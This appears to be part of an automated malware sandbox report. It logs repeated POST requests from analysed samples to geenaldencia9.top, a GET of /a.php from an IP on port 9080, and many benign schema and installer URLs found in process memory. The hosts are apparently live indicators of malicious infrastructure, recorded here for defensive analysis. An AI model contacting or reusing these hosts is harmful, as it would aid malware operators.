                    Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://geenaldencia9.top/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 248Host: geenaldencia9.top
                    Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://geenaldencia9.top/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 201Host: geenaldencia9.top
                    Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://geenaldencia9.top/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 232Host: geenaldencia9.top
                    Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://geenaldencia9.top/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 145Host: geenaldencia9.top
                    Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://geenaldencia9.top/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 316Host: geenaldencia9.top
                    Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://geenaldencia9.top/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 166Host: geenaldencia9.top
                    Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://geenaldencia9.top/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 161Host: geenaldencia9.top
                    Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://geenaldencia9.top/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 150Host: geenaldencia9.top
                    Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://geenaldencia9.top/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 319Host: geenaldencia9.top
                    Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://geenaldencia9.top/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 231Host: geenaldencia9.top
                    Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://geenaldencia9.top/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 310Host: geenaldencia9.top
                    Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://geenaldencia9.top/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 153Host: geenaldencia9.top
                    Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://geenaldencia9.top/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 198Host: geenaldencia9.top
                    Source: global trafficHTTP traffic detected: GET /a.php HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: 193.56.146.41:9080
                    Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://geenaldencia9.top/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 304Host: geenaldencia9.top
                    Source: global trafficTCP traffic: 192.168.2.6:49841 -> 193.56.146.41:9080
                    Source: 757C.exe, 00000016.00000002.664512356.0000000002D24000.00000004.00000001.sdmp, 757C.exe, 00000016.00000002.661066826.0000000002AB9000.00000004.00000001.sdmpString found in binary or memory: https://www.facebook.com/chat/video/videocalldownload.php
                    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 27 Sep 2021 17:34:18 GMTServer: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.5.38X-Powered-By: PHP/5.5.38Content-Length: 25Connection: closeContent-Type: text/html; charset=utf-8Data Raw: 14 00 00 00 7b fa f1 1f b5 69 2b 2c 47 fa 0e a8 c1 82 9f 4f 1a c4 da 16 00 Data Ascii: {i+,GO
                    Source: 8433.exe, 00000013.00000002.680997678.0000000003AE4000.00000004.00000001.sdmp, 757C.exe, 00000016.00000002.664512356.0000000002D24000.00000004.00000001.sdmpString found in binary or memory: http://appldnld.apple.com/QuickTime/041-3089.20111026.Sxpr4/QuickTimeInstaller.exe
                    Source: svchost.exe, 0000000D.00000002.505111408.000001D408B00000.00000004.00000001.sdmpString found in binary or memory: http://crl.globalsign.net/root-r2.crl0
                    Source: svchost.exe, 0000000D.00000002.503887822.000001D4082EB000.00000004.00000001.sdmpString found in binary or memory: http://crl.ver)
                    Source: 8433.exe, 00000013.00000002.676371823.0000000003641000.00000004.00000001.sdmp, 757C.exe, 00000016.00000002.657657090.00000000028E1000.00000004.00000001.sdmpString found in binary or memory: http://docs.oasis-open.org/ws-rx/wsrm/200702
                    Source: 8433.exe, 00000013.00000002.676371823.0000000003641000.00000004.00000001.sdmp, 757C.exe, 00000016.00000002.657657090.00000000028E1000.00000004.00000001.sdmpString found in binary or memory: http://docs.oasis-open.org/ws-rx/wsrm/200702/AckRequested
                    Source: 8433.exe, 00000013.00000002.676371823.0000000003641000.00000004.00000001.sdmp, 757C.exe, 00000016.00000002.657657090.00000000028E1000.00000004.00000001.sdmpString found in binary or memory: http://docs.oasis-open.org/ws-rx/wsrm/200702/CloseSequence
                    Source: 8433.exe, 00000013.00000002.676371823.0000000003641000.00000004.00000001.sdmp, 757C.exe, 00000016.00000002.657657090.00000000028E1000.00000004.00000001.sdmpString found in binary or memory: http://docs.oasis-open.org/ws-rx/wsrm/200702/CloseSequenceResponse
                    Source: 8433.exe, 00000013.00000002.676371823.0000000003641000.00000004.00000001.sdmp, 757C.exe, 00000016.00000002.657657090.00000000028E1000.00000004.00000001.sdmpString found in binary or memory: http://docs.oasis-open.org/ws-rx/wsrm/200702/CreateSequence
                    Source: 8433.exe, 00000013.00000002.676371823.0000000003641000.00000004.00000001.sdmp, 757C.exe, 00000016.00000002.657657090.00000000028E1000.00000004.00000001.sdmpString found in binary or memory: http://docs.oasis-open.org/ws-rx/wsrm/200702/CreateSequenceResponse
                    Source: 8433.exe, 00000013.00000002.676371823.0000000003641000.00000004.00000001.sdmp, 757C.exe, 00000016.00000002.657657090.00000000028E1000.00000004.00000001.sdmpString found in binary or memory: http://docs.oasis-open.org/ws-rx/wsrm/200702/SequenceAcknowledgement
                    Source: 8433.exe, 00000013.00000002.676371823.0000000003641000.00000004.00000001.sdmp, 757C.exe, 00000016.00000002.657657090.00000000028E1000.00000004.00000001.sdmpString found in binary or memory: http://docs.oasis-open.org/ws-rx/wsrm/200702/TerminateSequence
                    Source: 8433.exe, 00000013.00000002.676371823.0000000003641000.00000004.00000001.sdmp, 757C.exe, 00000016.00000002.657657090.00000000028E1000.00000004.00000001.sdmpString found in binary or memory: http://docs.oasis-open.org/ws-rx/wsrm/200702/TerminateSequenceResponse
                    Source: 8433.exe, 00000013.00000002.676371823.0000000003641000.00000004.00000001.sdmp, 757C.exe, 00000016.00000002.657657090.00000000028E1000.00000004.00000001.sdmpString found in binary or memory: http://docs.oasis-open.org/ws-rx/wsrm/200702/fault
                    Source: 8433.exe, 00000013.00000002.676371823.0000000003641000.00000004.00000001.sdmp, 757C.exe, 00000016.00000002.657657090.00000000028E1000.00000004.00000001.sdmpString found in binary or memory: http://docs.oasis-open.org/ws-sx/ws-secureconversation/200512
                    Source: 8433.exe, 00000013.00000002.676371823.0000000003641000.00000004.00000001.sdmp, 757C.exe, 00000016.00000002.657657090.00000000028E1000.00000004.00000001.sdmpString found in binary or memory: http://docs.oasis-open.org/ws-sx/ws-secureconversation/200512/dk
                    Source: 8433.exe, 00000013.00000002.676371823.0000000003641000.00000004.00000001.sdmp, 757C.exe, 00000016.00000002.657657090.00000000028E1000.00000004.00000001.sdmpString found in binary or memory: http://docs.oasis-open.org/ws-sx/ws-secureconversation/200512/dk/p_sha1$
                    Source: 8433.exe, 00000013.00000002.676371823.0000000003641000.00000004.00000001.sdmp, 757C.exe, 00000016.00000002.657657090.00000000028E1000.00000004.00000001.sdmpString found in binary or memory: http://docs.oasis-open.org/ws-sx/ws-secureconversation/200512/sct
                    Source: 8433.exe, 00000013.00000002.676371823.0000000003641000.00000004.00000001.sdmp, 757C.exe, 00000016.00000002.657657090.00000000028E1000.00000004.00000001.sdmpString found in binary or memory: http://docs.oasis-open.org/ws-sx/ws-trust/200512
                    Source: 8433.exe, 00000013.00000002.676371823.0000000003641000.00000004.00000001.sdmp, 757C.exe, 00000016.00000002.657657090.00000000028E1000.00000004.00000001.sdmpString found in binary or memory: http://docs.oasis-open.org/ws-sx/ws-trust/200512#BinarySecret
                    Source: 8433.exe, 00000013.00000002.676371823.0000000003641000.00000004.00000001.sdmp, 757C.exe, 00000016.00000002.657657090.00000000028E1000.00000004.00000001.sdmpString found in binary or memory: http://docs.oasis-open.org/ws-sx/ws-trust/200512/AsymmetricKey
                    Source: 8433.exe, 00000013.00000002.676371823.0000000003641000.00000004.00000001.sdmp, 757C.exe, 00000016.00000002.657657090.00000000028E1000.00000004.00000001.sdmpString found in binary or memory: http://docs.oasis-open.org/ws-sx/ws-trust/200512/Bearer
                    Source: 8433.exe, 00000013.00000002.676371823.0000000003641000.00000004.00000001.sdmp, 757C.exe, 00000016.00000002.657657090.00000000028E1000.00000004.00000001.sdmpString found in binary or memory: http://docs.oasis-open.org/ws-sx/ws-trust/200512/CK/PSHA1
                    Source: 8433.exe, 00000013.00000002.676371823.0000000003641000.00000004.00000001.sdmp, 757C.exe, 00000016.00000002.657657090.00000000028E1000.00000004.00000001.sdmpString found in binary or memory: http://docs.oasis-open.org/ws-sx/ws-trust/200512/Cancel
                    Source: 8433.exe, 00000013.00000002.676371823.0000000003641000.00000004.00000001.sdmp, 757C.exe, 00000016.00000002.657657090.00000000028E1000.00000004.00000001.sdmpString found in binary or memory: http://docs.oasis-open.org/ws-sx/ws-trust/200512/Issue
                    Source: 8433.exe, 00000013.00000002.676371823.0000000003641000.00000004.00000001.sdmp, 757C.exe, 00000016.00000002.657657090.00000000028E1000.00000004.00000001.sdmpString found in binary or memory: http://docs.oasis-open.org/ws-sx/ws-trust/200512/Nonce
                    Source: 8433.exe, 00000013.00000002.676371823.0000000003641000.00000004.00000001.sdmp, 757C.exe, 00000016.00000002.657657090.00000000028E1000.00000004.00000001.sdmpString found in binary or memory: http://docs.oasis-open.org/ws-sx/ws-trust/200512/PublicKey
                    Source: 8433.exe, 00000013.00000002.676371823.0000000003641000.00000004.00000001.sdmp, 757C.exe, 00000016.00000002.657657090.00000000028E1000.00000004.00000001.sdmpString found in binary or memory: http://docs.oasis-open.org/ws-sx/ws-trust/200512/RST/Cancel
                    Source: 8433.exe, 00000013.00000002.676371823.0000000003641000.00000004.00000001.sdmp, 757C.exe, 00000016.00000002.657657090.00000000028E1000.00000004.00000001.sdmpString found in binary or memory: http://docs.oasis-open.org/ws-sx/ws-trust/200512/RST/Issue
                    Source: 8433.exe, 00000013.00000002.676371823.0000000003641000.00000004.00000001.sdmp, 757C.exe, 00000016.00000002.657657090.00000000028E1000.00000004.00000001.sdmpString found in binary or memory: http://docs.oasis-open.org/ws-sx/ws-trust/200512/RST/Renew
                    Source: 8433.exe, 00000013.00000002.676371823.0000000003641000.00000004.00000001.sdmp, 757C.exe, 00000016.00000002.657657090.00000000028E1000.00000004.00000001.sdmpString found in binary or memory: http://docs.oasis-open.org/ws-sx/ws-trust/200512/RST/SCT
                    Source: 8433.exe, 00000013.00000002.676371823.0000000003641000.00000004.00000001.sdmp, 757C.exe, 00000016.00000002.657657090.00000000028E1000.00000004.00000001.sdmpString found in binary or memory: http://docs.oasis-open.org/ws-sx/ws-trust/200512/RST/SCT/Cancel
                    Source: 8433.exe, 00000013.00000002.676371823.0000000003641000.00000004.00000001.sdmp, 757C.exe, 00000016.00000002.657657090.00000000028E1000.00000004.00000001.sdmpString found in binary or memory: http://docs.oasis-open.org/ws-sx/ws-trust/200512/RST/SCT/Renew
                    Source: 8433.exe, 00000013.00000002.676371823.0000000003641000.00000004.00000001.sdmp, 757C.exe, 00000016.00000002.657657090.00000000028E1000.00000004.00000001.sdmpString found in binary or memory: http://docs.oasis-open.org/ws-sx/ws-trust/200512/RSTR/Cancel
                    Source: 8433.exe, 00000013.00000002.676371823.0000000003641000.00000004.00000001.sdmp, 757C.exe, 00000016.00000002.657657090.00000000028E1000.00000004.00000001.sdmpString found in binary or memory: http://docs.oasis-open.org/ws-sx/ws-trust/200512/RSTR/CancelFinal
                    Source: 8433.exe, 00000013.00000002.676371823.0000000003641000.00000004.00000001.sdmp, 757C.exe, 00000016.00000002.657657090.00000000028E1000.00000004.00000001.sdmpString found in binary or memory: http://docs.oasis-open.org/ws-sx/ws-trust/200512/RSTR/Issue
                    Source: 8433.exe, 00000013.00000002.676371823.0000000003641000.00000004.00000001.sdmp, 757C.exe, 00000016.00000002.657657090.00000000028E1000.00000004.00000001.sdmpString found in binary or memory: http://docs.oasis-open.org/ws-sx/ws-trust/200512/RSTR/Renew
                    Source: 8433.exe, 00000013.00000002.676371823.0000000003641000.00000004.00000001.sdmp, 757C.exe, 00000016.00000002.657657090.00000000028E1000.00000004.00000001.sdmpString found in binary or memory: http://docs.oasis-open.org/ws-sx/ws-trust/200512/RSTR/RenewFinal
                    Source: 8433.exe, 00000013.00000002.676371823.0000000003641000.00000004.00000001.sdmp, 757C.exe, 00000016.00000002.657657090.00000000028E1000.00000004.00000001.sdmpString found in binary or memory: http://docs.oasis-open.org/ws-sx/ws-trust/200512/RSTR/SCT
                    Source: 8433.exe, 00000013.00000002.676371823.0000000003641000.00000004.00000001.sdmp, 757C.exe, 00000016.00000002.657657090.00000000028E1000.00000004.00000001.sdmpString found in binary or memory: http://docs.oasis-open.org/ws-sx/ws-trust/200512/RSTR/SCT/Cancel
                    Source: 8433.exe, 00000013.00000002.676371823.0000000003641000.00000004.00000001.sdmp, 757C.exe, 00000016.00000002.657657090.00000000028E1000.00000004.00000001.sdmpString found in binary or memory: http://docs.oasis-open.org/ws-sx/ws-trust/200512/RSTR/SCT/Renew
                    Source: 8433.exe, 00000013.00000002.676371823.0000000003641000.00000004.00000001.sdmp, 757C.exe, 00000016.00000002.657657090.00000000028E1000.00000004.00000001.sdmpString found in binary or memory: http://docs.oasis-open.org/ws-sx/ws-trust/200512/RSTRC/IssueFinal
                    Source: 8433.exe, 00000013.00000002.676371823.0000000003641000.00000004.00000001.sdmp, 757C.exe, 00000016.00000002.657657090.00000000028E1000.00000004.00000001.sdmpString found in binary or memory: http://docs.oasis-open.org/ws-sx/ws-trust/200512/Renew
                    Source: 8433.exe, 00000013.00000002.676371823.0000000003641000.00000004.00000001.sdmp, 757C.exe, 00000016.00000002.657657090.00000000028E1000.00000004.00000001.sdmpString found in binary or memory: http://docs.oasis-open.org/ws-sx/ws-trust/200512/SymmetricKey
                    Source: 8433.exe, 00000013.00000002.676371823.0000000003641000.00000004.00000001.sdmp, 757C.exe, 00000016.00000002.657657090.00000000028E1000.00000004.00000001.sdmpString found in binary or memory: http://docs.oasis-open.org/ws-tx/wsat/2006/06
                    Source: 8433.exe, 00000013.00000002.676371823.0000000003641000.00000004.00000001.sdmp, 757C.exe, 00000016.00000002.657657090.00000000028E1000.00000004.00000001.sdmpString found in binary or memory: http://docs.oasis-open.org/ws-tx/wsat/2006/06/Aborted
                    Source: 8433.exe, 00000013.00000002.676371823.0000000003641000.00000004.00000001.sdmp, 757C.exe, 00000016.00000002.657657090.00000000028E1000.00000004.00000001.sdmpString found in binary or memory: http://docs.oasis-open.org/ws-tx/wsat/2006/06/Commit
                    Source: 8433.exe, 00000013.00000002.676371823.0000000003641000.00000004.00000001.sdmp, 757C.exe, 00000016.00000002.657657090.00000000028E1000.00000004.00000001.sdmpString found in binary or memory: http://docs.oasis-open.org/ws-tx/wsat/2006/06/Committed
                    Source: 8433.exe, 00000013.00000002.676371823.0000000003641000.00000004.00000001.sdmp, 757C.exe, 00000016.00000002.657657090.00000000028E1000.00000004.00000001.sdmpString found in binary or memory: http://docs.oasis-open.org/ws-tx/wsat/2006/06/Completion
                    Source: 8433.exe, 00000013.00000002.676371823.0000000003641000.00000004.00000001.sdmp, 757C.exe, 00000016.00000002.657657090.00000000028E1000.00000004.00000001.sdmpString found in binary or memory: http://docs.oasis-open.org/ws-tx/wsat/2006/06/Durable2PC
                    Source: 8433.exe, 00000013.00000002.676371823.0000000003641000.00000004.00000001.sdmp, 757C.exe, 00000016.00000002.657657090.00000000028E1000.00000004.00000001.sdmpString found in binary or memory: http://docs.oasis-open.org/ws-tx/wsat/2006/06/Prepare
                    Source: 8433.exe, 00000013.00000002.676371823.0000000003641000.00000004.00000001.sdmp, 757C.exe, 00000016.00000002.657657090.00000000028E1000.00000004.00000001.sdmpString found in binary or memory: http://docs.oasis-open.org/ws-tx/wsat/2006/06/Prepared
                    Source: 8433.exe, 00000013.00000002.676371823.0000000003641000.00000004.00000001.sdmp, 757C.exe, 00000016.00000002.657657090.00000000028E1000.00000004.00000001.sdmpString found in binary or memory: http://docs.oasis-open.org/ws-tx/wsat/2006/06/ReadOnly
                    Source: 8433.exe, 00000013.00000002.676371823.0000000003641000.00000004.00000001.sdmp, 757C.exe, 00000016.00000002.657657090.00000000028E1000.00000004.00000001.sdmpString found in binary or memory: http://docs.oasis-open.org/ws-tx/wsat/2006/06/Replay
                    Source: 8433.exe, 00000013.00000002.676371823.0000000003641000.00000004.00000001.sdmp, 757C.exe, 00000016.00000002.657657090.00000000028E1000.00000004.00000001.sdmpString found in binary or memory: http://docs.oasis-open.org/ws-tx/wsat/2006/06/Rollback
                    Source: 8433.exe, 00000013.00000002.676371823.0000000003641000.00000004.00000001.sdmp, 757C.exe, 00000016.00000002.657657090.00000000028E1000.00000004.00000001.sdmpString found in binary or memory: http://docs.oasis-open.org/ws-tx/wsat/2006/06/Volatile2PC
                    Source: 8433.exe, 00000013.00000002.676371823.0000000003641000.00000004.00000001.sdmp, 757C.exe, 00000016.00000002.657657090.00000000028E1000.00000004.00000001.sdmpString found in binary or memory: http://docs.oasis-open.org/ws-tx/wsat/2006/06/fault
                    Source: 8433.exe, 00000013.00000002.676371823.0000000003641000.00000004.00000001.sdmp, 757C.exe, 00000016.00000002.657657090.00000000028E1000.00000004.00000001.sdmpString found in binary or memory: http://docs.oasis-open.org/ws-tx/wscoor/2006/06
                    Source: 8433.exe, 00000013.00000002.676371823.0000000003641000.00000004.00000001.sdmp, 757C.exe, 00000016.00000002.657657090.00000000028E1000.00000004.00000001.sdmpString found in binary or memory: http://docs.oasis-open.org/ws-tx/wscoor/2006/06/CreateCoordinationContext
                    Source: 8433.exe, 00000013.00000002.676371823.0000000003641000.00000004.00000001.sdmp, 757C.exe, 00000016.00000002.657657090.00000000028E1000.00000004.00000001.sdmpString found in binary or memory: http://docs.oasis-open.org/ws-tx/wscoor/2006/06/CreateCoordinationContextResponse
                    Source: 8433.exe, 00000013.00000002.676371823.0000000003641000.00000004.00000001.sdmp, 757C.exe, 00000016.00000002.657657090.00000000028E1000.00000004.00000001.sdmpString found in binary or memory: http://docs.oasis-open.org/ws-tx/wscoor/2006/06/Register
                    Source: 8433.exe, 00000013.00000002.676371823.0000000003641000.00000004.00000001.sdmp, 757C.exe, 00000016.00000002.657657090.00000000028E1000.00000004.00000001.sdmpString found in binary or memory: http://docs.oasis-open.org/ws-tx/wscoor/2006/06/RegisterResponse
                    Source: 8433.exe, 00000013.00000002.676371823.0000000003641000.00000004.00000001.sdmp, 757C.exe, 00000016.00000002.657657090.00000000028E1000.00000004.00000001.sdmpString found in binary or memory: http://docs.oasis-open.org/ws-tx/wscoor/2006/06/fault
                    Source: 8433.exe, 00000013.00000002.677190615.00000000036D5000.00000004.00000001.sdmp, 757C.exe, 00000016.00000002.659025289.0000000002973000.00000004.00000001.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-soap-message-security-1.0#Base64Binary
                    Source: 8433.exe, 00000013.00000002.677190615.00000000036D5000.00000004.00000001.sdmp, 757C.exe, 00000016.00000002.659025289.0000000002973000.00000004.00000001.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-soap-message-security-1.0#HexBinary
                    Source: 8433.exe, 00000013.00000002.677190615.00000000036D5000.00000004.00000001.sdmp, 757C.exe, 00000016.00000002.659025289.0000000002973000.00000004.00000001.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-soap-message-security-1.0#Text
                    Source: 8433.exe, 00000013.00000002.677190615.00000000036D5000.00000004.00000001.sdmp, 757C.exe, 00000016.00000002.659025289.0000000002973000.00000004.00000001.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-secext-1.0.xsd
                    Source: 8433.exe, 00000013.00000002.677190615.00000000036D5000.00000004.00000001.sdmp, 757C.exe, 00000016.00000002.659025289.0000000002973000.00000004.00000001.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-utility-1.0.xsd
                    Source: 8433.exe, 00000013.00000002.677190615.00000000036D5000.00000004.00000001.sdmp, 757C.exe, 00000016.00000002.659025289.0000000002973000.00000004.00000001.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-x509-token-profile-1.0#X509SubjectKeyIdentif
                    Source: 8433.exe, 00000013.00000002.677190615.00000000036D5000.00000004.00000001.sdmp, 757C.exe, 00000016.00000002.659025289.0000000002973000.00000004.00000001.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-kerberos-token-profile-1.1#GSS_Kerberosv5_AP_REQ
                    Source: 8433.exe, 00000013.00000002.677190615.00000000036D5000.00000004.00000001.sdmp, 757C.exe, 00000016.00000002.659025289.0000000002973000.00000004.00000001.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-kerberos-token-profile-1.1#GSS_Kerberosv5_AP_REQ1510
                    Source: 8433.exe, 00000013.00000002.677190615.00000000036D5000.00000004.00000001.sdmp, 757C.exe, 00000016.00000002.659025289.0000000002973000.00000004.00000001.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-kerberos-token-profile-1.1#Kerberosv5APREQSHA1
                    Source: 8433.exe, 00000013.00000002.677190615.00000000036D5000.00000004.00000001.sdmp, 757C.exe, 00000016.00000002.659025289.0000000002973000.00000004.00000001.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-rel-token-profile-1.0.pdf#license
                    Source: 8433.exe, 00000013.00000002.677190615.00000000036D5000.00000004.00000001.sdmp, 757C.exe, 00000016.00000002.659025289.0000000002973000.00000004.00000001.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-saml-token-profile-1.0#SAMLAssertionID
                    Source: 8433.exe, 00000013.00000002.677190615.00000000036D5000.00000004.00000001.sdmp, 757C.exe, 00000016.00000002.659025289.0000000002973000.00000004.00000001.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-saml-token-profile-1.1#SAMLID
                    Source: 8433.exe, 00000013.00000002.677190615.00000000036D5000.00000004.00000001.sdmp, 757C.exe, 00000016.00000002.659025289.0000000002973000.00000004.00000001.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-saml-token-profile-1.1#SAMLV1.1
                    Source: 8433.exe, 00000013.00000002.677190615.00000000036D5000.00000004.00000001.sdmp, 757C.exe, 00000016.00000002.659025289.0000000002973000.00000004.00000001.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-saml-token-profile-1.1#SAMLV2.0
                    Source: 8433.exe, 00000013.00000002.677190615.00000000036D5000.00000004.00000001.sdmp, 757C.exe, 00000016.00000002.659025289.0000000002973000.00000004.00000001.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-soap-message-security-1.1#EncryptedKey
                    Source: 8433.exe, 00000013.00000002.677190615.00000000036D5000.00000004.00000001.sdmp, 757C.exe, 00000016.00000002.659025289.0000000002973000.00000004.00000001.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-soap-message-security-1.1#EncryptedKeySHA1
                    Source: 8433.exe, 00000013.00000002.677190615.00000000036D5000.00000004.00000001.sdmp, 757C.exe, 00000016.00000002.659025289.0000000002973000.00000004.00000001.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-soap-message-security-1.1#ThumbprintSHA1
                    Source: 8433.exe, 00000013.00000002.677190615.00000000036D5000.00000004.00000001.sdmp, 757C.exe, 00000016.00000002.659025289.0000000002973000.00000004.00000001.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-wssecurity-secext-1.1.xsd
                    Source: 8433.exe, 00000013.00000002.680997678.0000000003AE4000.00000004.00000001.sdmp, 8433.exe, 00000013.00000002.681982512.0000000003BD1000.00000004.00000001.sdmp, 757C.exe, 00000016.00000002.664512356.0000000002D24000.00000004.00000001.sdmp, 757C.exe, 00000016.00000002.661066826.0000000002AB9000.00000004.00000001.sdmpString found in binary or memory: http://download.divx.com/player/divxdotcom/DivXWebPlayerInstaller.exe
                    Source: 8433.exe, 00000013.00000002.680997678.0000000003AE4000.00000004.00000001.sdmp, 757C.exe, 00000016.00000002.664512356.0000000002D24000.00000004.00000001.sdmpString found in binary or memory: http://forms.rea
                    Source: 8433.exe, 00000013.00000002.680997678.0000000003AE4000.00000004.00000001.sdmp, 757C.exe, 00000016.00000002.664512356.0000000002D24000.00000004.00000001.sdmpString found in binary or memory: http://forms.real.com/real/realone/download.html?type=rpsp_us
                    Source: 8433.exe, 00000013.00000002.680997678.0000000003AE4000.00000004.00000001.sdmp, 8433.exe, 00000013.00000002.681982512.0000000003BD1000.00000004.00000001.sdmp, 8433.exe, 00000013.00000002.677435791.0000000003726000.00000004.00000001.sdmp, 757C.exe, 00000016.00000002.664512356.0000000002D24000.00000004.00000001.sdmp, 757C.exe, 00000016.00000002.661066826.0000000002AB9000.00000004.00000001.sdmpString found in binary or memory: http://fpdownload.macromedia.com/get/shockwave/default/english/win95nt/latest/Shockwave_Installer_Sl
                    Source: 8433.exe, 00000013.00000002.680997678.0000000003AE4000.00000004.00000001.sdmp, 757C.exe, 00000016.00000002.664512356.0000000002D24000.00000004.00000001.sdmpString found in binary or memory: http://go.micros
                    Source: 8433.exe, 00000013.00000002.676371823.0000000003641000.00000004.00000001.sdmp, 757C.exe, 00000016.00000002.657657090.00000000028E1000.00000004.00000001.sdmpString found in binary or memory: http://schemas.datacontract.org/2004/07/
                    Source: 8433.exe, 00000013.00000002.677190615.00000000036D5000.00000004.00000001.sdmp, 757C.exe, 00000016.00000002.659025289.0000000002973000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/2005/02/trust/spnego#GSS_Wrap
                    Source: 8433.exe, 00000013.00000002.677190615.00000000036D5000.00000004.00000001.sdmp, 757C.exe, 00000016.00000002.659025289.0000000002973000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/2005/02/trust/tlsnego#TLS_Wrap
                    Source: 8433.exe, 00000013.00000002.676371823.0000000003641000.00000004.00000001.sdmp, 757C.exe, 00000016.00000002.657657090.00000000028E1000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/soap/actor/next
                    Source: 8433.exe, 00000013.00000002.676371823.0000000003641000.00000004.00000001.sdmp, 757C.exe, 00000016.00000002.657657090.00000000028E1000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/soap/envelope/
                    Source: 8433.exe, 00000013.00000002.677190615.00000000036D5000.00000004.00000001.sdmp, 757C.exe, 00000016.00000002.659025289.0000000002973000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2002/12/policy
                    Source: 8433.exe, 00000013.00000002.677190615.00000000036D5000.00000004.00000001.sdmp, 757C.exe, 00000016.00000002.659025289.0000000002973000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/sc
                    Source: 8433.exe, 00000013.00000002.677190615.00000000036D5000.00000004.00000001.sdmp, 757C.exe, 00000016.00000002.659025289.0000000002973000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/security/sc/dk
